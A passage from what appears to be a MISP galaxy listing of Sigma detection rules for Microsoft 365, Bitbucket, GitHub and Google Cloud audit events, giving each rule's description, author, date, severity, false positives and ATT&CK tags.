UUID ff246f56-7f24-402a-baca-b86540e3925c which can be used as unique global reference for Microsoft 365 - User Restricted from Sending Email in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author austinsonger
creation_date 2021/08/19
falsepositive ['Unknown']
filename microsoft365_user_restricted_from_sending_email.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.initial_access', 'attack.t1199']

Suspicious OAuth App File Download Activities

Detects when Microsoft Cloud App Security reports that an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.

Internal MISP references

UUID ee111937-1fe7-40f0-962a-0eb44d57d174 which can be used as unique global reference for Suspicious OAuth App File Download Activities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['Unknown']
filename microsoft365_susp_oauth_app_file_download_activities.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.exfiltration']

Microsoft 365 - Impossible Travel Activity

Detects when Microsoft Cloud App Security reports a risky sign-in attempt due to a login associated with impossible travel.

Internal MISP references

UUID d7eab125-5f94-43df-8710-795b80fa1189 which can be used as unique global reference for Microsoft 365 - Impossible Travel Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2020/07/06
falsepositive ['Unknown']
filename microsoft365_impossible_travel_activity.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.initial_access', 'attack.t1078']

Microsoft 365 - Potential Ransomware Activity

Detects when Microsoft Cloud App Security reports that a user uploads files to the cloud that might be infected with ransomware.

Internal MISP references

UUID bd132164-884a-48f1-aa2d-c6d646b04c69 which can be used as unique global reference for Microsoft 365 - Potential Ransomware Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author austinsonger
creation_date 2021/08/19
falsepositive ['Unknown']
filename microsoft365_potential_ransomware_activity.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.impact', 'attack.t1486']

PST Export Alert Using eDiscovery Alert

Alerts when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually contains sensitive information, including email body content.

Internal MISP references

UUID 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 which can be used as unique global reference for PST Export Alert Using eDiscovery Alert in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sorina Ionescu
creation_date 2022/02/08
falsepositive ['PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored.']
filename microsoft365_pst_export_alert.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.collection', 'attack.t1114']

Activity from Infrequent Country

Detects when Microsoft Cloud App Security reports an activity from a location that was not recently visited, or was never visited, by any user in the organization.

Internal MISP references

UUID 0f2468a2-5055-4212-a368-7321198ee706 which can be used as unique global reference for Activity from Infrequent Country in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['Unknown']
filename microsoft365_activity_from_infrequent_country.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.command_and_control', 'attack.t1573']

Activity from Suspicious IP Addresses

Detects when Microsoft Cloud App Security reports that users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as botnet C&C, and may indicate a compromised account.

Internal MISP references

UUID a3501e8e-af9e-43c6-8cd6-9360bdaae498 which can be used as unique global reference for Activity from Suspicious IP Addresses in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['Unknown']
filename microsoft365_from_susp_ip_addresses.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.command_and_control', 'attack.t1573']

Bitbucket Unauthorized Access To A Resource

Detects unauthorized access attempts to a resource.

Internal MISP references

UUID 7215374a-de4f-4b33-8ba5-70804c9251d3 which can be used as unique global reference for Bitbucket Unauthorized Access To A Resource in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Access attempts to non-existent repositories or due to outdated plugins. In most cases the "Anonymous" user is reported in the "author.name" field.']
filename bitbucket_audit_unauthorized_access_detected.yml
level critical
logsource.category No established category
logsource.product bitbucket
tags ['attack.resource_development', 'attack.t1586']

Bitbucket Global SSH Settings Changed

Detects Bitbucket global SSH access configuration changes.

Internal MISP references

UUID 16ab6143-510a-44e2-a615-bdb80b8317fc which can be used as unique global reference for Bitbucket Global SSH Settings Changed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_global_ssh_settings_change_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.lateral_movement', 'attack.defense_evasion', 'attack.t1562.001', 'attack.t1021.004']

Bitbucket Secret Scanning Exempt Repository Added

Detects when a repository is exempted from the secret scanning feature.

Internal MISP references

UUID b91e8d5e-0033-44fe-973f-b730316f23a1 which can be used as unique global reference for Bitbucket Secret Scanning Exempt Repository Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_secret_scanning_exempt_repository_detected.yml
level high
logsource.category No established category
logsource.product bitbucket
tags ['attack.defense_evasion', 'attack.t1562.001']

Bitbucket User Permissions Export Attempt

Detects a user permission data export attempt.

Internal MISP references

UUID 87cc6698-3e07-4ba2-9b43-a85a73e151e2 which can be used as unique global reference for Bitbucket User Permissions Export Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_user_permissions_export_attempt_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.reconnaissance', 'attack.t1213', 'attack.t1082', 'attack.t1591.004']

Bitbucket Audit Log Configuration Updated

Detects changes to the Bitbucket audit log configuration.

Internal MISP references

UUID 6aa12161-235a-4dfb-9c74-fe08df8d8da1 which can be used as unique global reference for Bitbucket Audit Log Configuration Updated in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_log_configuration_update_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.defense_evasion', 'attack.t1562.001']

Bitbucket Secret Scanning Rule Deleted

Detects when a secret scanning rule is deleted for a project or repository.

Internal MISP references

UUID ff91e3f0-ad15-459f-9a85-1556390c138d which can be used as unique global reference for Bitbucket Secret Scanning Rule Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_secret_scanning_rule_deleted.yml
level low
logsource.category No established category
logsource.product bitbucket
tags ['attack.defense_evasion', 'attack.t1562.001']

Bitbucket Full Data Export Triggered

Detects when a full data export is attempted.

Internal MISP references

UUID 195e1b9d-bfc2-4ffa-ab4e-35aef69815f8 which can be used as unique global reference for Bitbucket Full Data Export Triggered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_full_data_export_triggered.yml
level high
logsource.category No established category
logsource.product bitbucket
tags ['attack.collection', 'attack.t1213.003']

Bitbucket Global Permission Changed

Detects global permissions change activity.

Internal MISP references

UUID aac6c4f4-87c7-4961-96ac-c3fd3a42c310 which can be used as unique global reference for Bitbucket Global Permission Changed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_global_permissions_change_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1098']

Bitbucket Project Secret Scanning Allowlist Added

Detects when a secret scanning allowlist rule is added for projects.

Internal MISP references

UUID 42ccce6d-7bd3-4930-95cd-e4d83fa94a30 which can be used as unique global reference for Bitbucket Project Secret Scanning Allowlist Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_project_secret_scanning_allowlist_added.yml
level low
logsource.category No established category
logsource.product bitbucket
tags ['attack.defense_evasion', 'attack.t1562.001']

Bitbucket User Login Failure Via SSH

Detects SSH user login access failures. Please note that this rule can be noisy; it is recommended to use it with correlation based on the "author.name" field.

Internal MISP references

UUID d3f90469-fb05-42ce-b67d-0fded91bbef3 which can be used as unique global reference for Bitbucket User Login Failure Via SSH in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user wrong password attempts.']
filename bitbucket_audit_user_login_failure_via_ssh_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.t1021.004', 'attack.t1110']

Bitbucket Unauthorized Full Data Export Triggered

Detects when a full data export is attempted by an unauthorized user.

Internal MISP references

UUID 34d81081-03c9-4a7f-91c9-5e46af625cde which can be used as unique global reference for Bitbucket Unauthorized Full Data Export Triggered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Unlikely']
filename bitbucket_audit_unauthorized_full_data_export_triggered.yml
level critical
logsource.category No established category
logsource.product bitbucket
tags ['attack.collection', 'attack.resource_development', 'attack.t1213.003', 'attack.t1586']

Bitbucket Global Secret Scanning Rule Deleted

Detects Bitbucket global secret scanning rule deletion activity.

Internal MISP references

UUID e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05 which can be used as unique global reference for Bitbucket Global Secret Scanning Rule Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_global_secret_scanning_rule_deleted.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Bitbucket User Details Export Attempt Detected

Detects user data export activity.

Internal MISP references

UUID 5259cbf2-0a75-48bf-b57a-c54d6fabaef3 which can be used as unique global reference for Bitbucket User Details Export Attempt Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_user_details_export_attempt_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.collection', 'attack.reconnaissance', 'attack.discovery', 'attack.t1213', 'attack.t1082', 'attack.t1591.004']
Related clusters

To see the related clusters, click here.

Bitbucket User Login Failure

Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use it with correlation based on the "author.name" field.

Internal MISP references

UUID 70ed1d26-0050-4b38-a599-92c53d57d45a which can be used as unique global reference for Bitbucket User Login Failure in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user wrong password attempts.']
filename bitbucket_audit_user_login_failure_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.defense_evasion', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Github Push Protection Disabled

Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.

Internal MISP references

UUID ccd55945-badd-4bae-936b-823a735d37dd which can be used as unique global reference for Github Push Protection Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/03/07
falsepositive ['Allowed administrative activities.']
filename github_push_protection_disabled.yml
level high
logsource.category No established category
logsource.product github
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

New Github Organization Member Added

Detects when a new member is added or invited to a GitHub organization.

Internal MISP references

UUID 3908d64a-3c06-4091-b503-b3a94424533b which can be used as unique global reference for New Github Organization Member Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/29
falsepositive ['Organization approved new members']
filename github_new_org_member.yml
level informational
logsource.category No established category
logsource.product github
tags ['attack.persistence', 'attack.t1136.003']
Related clusters

To see the related clusters, click here.

Github New Secret Created

Detects when a user creates an action secret for the organization, environment, codespaces or repository.

Internal MISP references

UUID f9405037-bc97-4eb7-baba-167dad399b83 which can be used as unique global reference for Github New Secret Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/20
falsepositive ['This detection could be noisy depending on the environment. It is recommended to keep a check on new secrets when they are created and to validate the "actor".']
filename github_new_secret_created.yml
level low
logsource.category No established category
logsource.product github
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.initial_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Github Delete Action Invoked

Detects a delete action in the GitHub audit logs for codespaces, environments, projects and repositories.

Internal MISP references

UUID 16a71777-0b2e-4db7-9888-9d59cb75200b which can be used as unique global reference for Github Delete Action Invoked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/19
falsepositive ['Validate that the deletion activity is permitted. The "actor" field needs to be validated.']
filename github_delete_action_invoked.yml
level medium
logsource.category No established category
logsource.product github
tags ['attack.impact', 'attack.collection', 'attack.t1213.003']
Related clusters

To see the related clusters, click here.

Github Outside Collaborator Detected

Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed, when an owner removes an outside collaborator from an organization, or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.

Internal MISP references

UUID eaa9ac35-1730-441f-9587-25767bde99d7 which can be used as unique global reference for Github Outside Collaborator Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/20
falsepositive ['Validate the actor if permitted to access the repo.', 'Validate the Multifactor Authentication changes.']
filename github_outside_collaborator_detected.yml
level medium
logsource.category No established category
logsource.product github
tags ['attack.persistence', 'attack.collection', 'attack.t1098.001', 'attack.t1098.003', 'attack.t1213.003']
Related clusters

To see the related clusters, click here.

Github High Risk Configuration Disabled

Detects when a user disables a critical security feature for an organization.

Internal MISP references

UUID 8622c92d-c00e-463c-b09d-fd06166f6794 which can be used as unique global reference for Github High Risk Configuration Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/29
falsepositive ['Approved administrator/owner activities.']
filename github_disable_high_risk_configuration.yml
level high
logsource.category No established category
logsource.product github
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.persistence', 'attack.t1556']
Related clusters

To see the related clusters, click here.

Github Self Hosted Runner Changes Detected

A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once a self-hosted runner configuration change is detected, it should be validated in the GitHub UI because the log entry may not provide full context.

Internal MISP references

UUID f8ed0e8f-7438-4b79-85eb-f358ef2fbebd which can be used as unique global reference for Github Self Hosted Runner Changes Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/27
falsepositive ['Allowed self-hosted runners changes in the environment.', 'A self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 14 days.', 'An ephemeral self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 1 day.']
filename github_self_hosted_runner_changes_detected.yml
level low
logsource.category No established category
logsource.product github
tags ['attack.impact', 'attack.discovery', 'attack.collection', 'attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.initial_access', 'attack.t1526', 'attack.t1213.003', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Github Secret Scanning Feature Disabled

Detects if the secret scanning feature is disabled for an enterprise or repository.

Internal MISP references

UUID 3883d9a0-fd0f-440f-afbb-445a2a799bb8 which can be used as unique global reference for Github Secret Scanning Feature Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/03/07
falsepositive ['Allowed administrative activities.']
filename github_secret_scanning_feature_disabled.yml
level high
logsource.category No established category
logsource.product github
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Outdated Dependency Or Vulnerability Alert Disabled

Dependabot performs a scan to detect insecure dependencies and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts for private repositories or Dependabot security updates for all repositories.

Internal MISP references

UUID 34e1c7d4-0cd5-419d-9f1b-1dad3f61018d which can be used as unique global reference for Outdated Dependency Or Vulnerability Alert Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/27
falsepositive ["Approved changes by the Organization owner. Please validate the 'actor' if authorized to make the changes."]
filename github_disabled_outdated_dependency_or_vulnerability.yml
level high
logsource.category No established category
logsource.product github
tags ['attack.initial_access', 'attack.t1195.001']
Related clusters

To see the related clusters, click here.

Github Push Protection Bypass Detected

Detects when a user bypasses the push protection on a secret detected by secret scanning.

Internal MISP references

UUID 02cf536a-cf21-4876-8842-4159c8aee3cc which can be used as unique global reference for Github Push Protection Bypass Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/03/07
falsepositive ['Allowed administrative activities.']
filename github_push_protection_bypass_detected.yml
level low
logsource.category No established category
logsource.product github
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Google Cloud DNS Zone Modified or Deleted

Identifies when a DNS Zone is modified or deleted in Google Cloud.

Internal MISP references

UUID 28268a8f-191f-4c17-85b2-f5aa4fa829c3 which can be used as unique global reference for Google Cloud DNS Zone Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/15
falsepositive ['Unknown']
filename gcp_dns_zone_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Cloud Kubernetes Secrets Modified or Deleted

Identifies when Secrets are modified or deleted.

Internal MISP references

UUID 2f0bae2d-bf20-4465-be86-1311addebaa3 which can be used as unique global reference for Google Cloud Kubernetes Secrets Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/09
falsepositive ['Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_kubernetes_secrets_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.credential_access']

Google Cloud SQL Database Modified or Deleted

Detect when a Cloud SQL DB has been modified or deleted.

Internal MISP references

UUID f346bbd5-2c4e-4789-a221-72de7685090d which can be used as unique global reference for Google Cloud SQL Database Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/10/15
falsepositive ['SQL Database being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_sql_database_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Cloud Service Account Modified

Identifies when a service account is modified in Google Cloud.

Internal MISP references

UUID 6b67c12e-5e40-47c6-b3b0-1e6b571184cc which can be used as unique global reference for Google Cloud Service Account Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/14
falsepositive ['Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_service_account_modified.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Cloud Kubernetes RoleBinding

Detects the creation or patching of a potentially malicious RoleBinding. This includes RoleBindings and ClusterRoleBindings.

Internal MISP references

UUID 0322d9f2-289a-47c2-b5e1-b63c90901a3e which can be used as unique global reference for Google Cloud Kubernetes RoleBinding in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/09
falsepositive ['RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_kubernetes_rolebinding.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.credential_access']

Google Cloud Storage Buckets Enumeration

Detects when a storage bucket is enumerated in Google Cloud.

Internal MISP references

UUID e2feb918-4e77-4608-9697-990a1aaf74c3 which can be used as unique global reference for Google Cloud Storage Buckets Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/14
falsepositive ['Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_bucket_enumeration.yml
level low
logsource.category No established category
logsource.product gcp
tags ['attack.discovery']

GCP Break-glass Container Workload Deployed

Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.

Internal MISP references

UUID 76737c19-66ee-4c07-b65a-a03301d1573d which can be used as unique global reference for GCP Break-glass Container Workload Deployed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bryan Lim
creation_date 2024/01/12
falsepositive ['Unknown']
filename gcp_breakglass_container_workload_deployed.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.defense_evasion', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Google Cloud Kubernetes CronJob

Identifies when a Kubernetes CronJob runs in Google Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Jobs can be used to run containers that perform finite tasks for batch jobs. A Kubernetes CronJob is used to schedule Jobs. An adversary may use a Kubernetes CronJob to schedule the execution of malicious code that would run as a container in the cluster.

Internal MISP references

UUID cd3a808c-c7b7-4c50-a2f3-f4cfcd436435 which can be used as unique global reference for Google Cloud Kubernetes CronJob in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/22
falsepositive ['Google Cloud Kubernetes CronJob/Job may be done by a system administrator.', 'If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_kubernetes_cronjob.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.execution']

Google Cloud VPN Tunnel Modified or Deleted

Identifies when a VPN tunnel is modified or deleted in Google Cloud.

Internal MISP references

UUID 99980a85-3a61-43d3-ac0f-b68d6b4797b1 which can be used as unique global reference for Google Cloud VPN Tunnel Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/16
falsepositive ['VPN Tunnel being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_vpn_tunnel_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Cloud Firewall Modified or Deleted

Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).

Internal MISP references

UUID fe513c69-734c-4d4a-8548-ac5f609be82b which can be used as unique global reference for Google Cloud Firewall Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/13
falsepositive ['Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.', 'Exceptions can be added to this rule to filter expected behavior.']
filename gcp_firewall_rule_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Google Cloud Re-identifies Sensitive Information

Identifies when sensitive information is re-identified in Google Cloud.

Internal MISP references

UUID 234f9f48-904b-4736-a34c-55d23919e4b7 which can be used as unique global reference for Google Cloud Re-identifies Sensitive Information in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/15
falsepositive ['Unknown']
filename gcp_dlp_re_identifies_sensitive_information.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact', 'attack.t1565']
Related clusters

To see the related clusters, click here.

Google Cloud Kubernetes Admission Controller

Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks, for example a MutatingAdmissionWebhook, to obtain persistence in the cluster: attackers can intercept and modify pod creation operations in the cluster and add their malicious container to every created pod. An adversary can also use a ValidatingAdmissionWebhook to obtain access credentials, since such a webhook can intercept requests to the API server and record secrets and other sensitive information.

Internal MISP references

UUID 6ad91e31-53df-4826-bd27-0166171c8040 which can be used as unique global reference for Google Cloud Kubernetes Admission Controller in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/25
falsepositive ['Google Cloud Kubernetes Admission Controller may be done by a system administrator.', 'If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_kubernetes_admission_controller.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.persistence', 'attack.t1078', 'attack.credential_access', 'attack.t1552', 'attack.t1552.007']
Related clusters

To see the related clusters, click here.

Google Cloud Service Account Disabled or Deleted

Identifies when a service account is disabled or deleted in Google Cloud.

Internal MISP references

UUID 13f81a90-a69c-4fab-8f07-b5bb55416a9f which can be used as unique global reference for Google Cloud Service Account Disabled or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/14
falsepositive ['Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_service_account_disabled_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

Google Cloud Storage Buckets Modified or Deleted

Detects when a storage bucket is modified or deleted in Google Cloud.

Internal MISP references

UUID 4d9f2ee2-c903-48ab-b9c1-8c0f474913d0 which can be used as unique global reference for Google Cloud Storage Buckets Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/14
falsepositive ['Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_bucket_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Full Network Traffic Packet Capture

Identifies potential full network packet capture in GCP. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.

Internal MISP references

UUID 980a7598-1e7f-4962-9372-2d754c930d0e which can be used as unique global reference for Google Full Network Traffic Packet Capture in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/13
falsepositive ['Full Network Packet Capture may be done by a system or network administrator.', 'If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_full_network_traffic_packet_capture.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.collection', 'attack.t1074']
Related clusters

To see the related clusters, click here.

GCP Access Policy Deleted

Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.

Internal MISP references

UUID 32438676-1dba-4ac7-bf69-b86cba995e05 which can be used as unique global reference for GCP Access Policy Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bryan Lim
creation_date 2024/01/12
falsepositive ['Legitimate administrative activities']
filename gcp_access_policy_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Google Workspace Role Privilege Deleted

Detects when a role privilege is deleted in Google Workspace.

Internal MISP references

UUID bf638ef7-4d2d-44bb-a1dc-a238252e6267 which can be used as unique global reference for Google Workspace Role Privilege Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
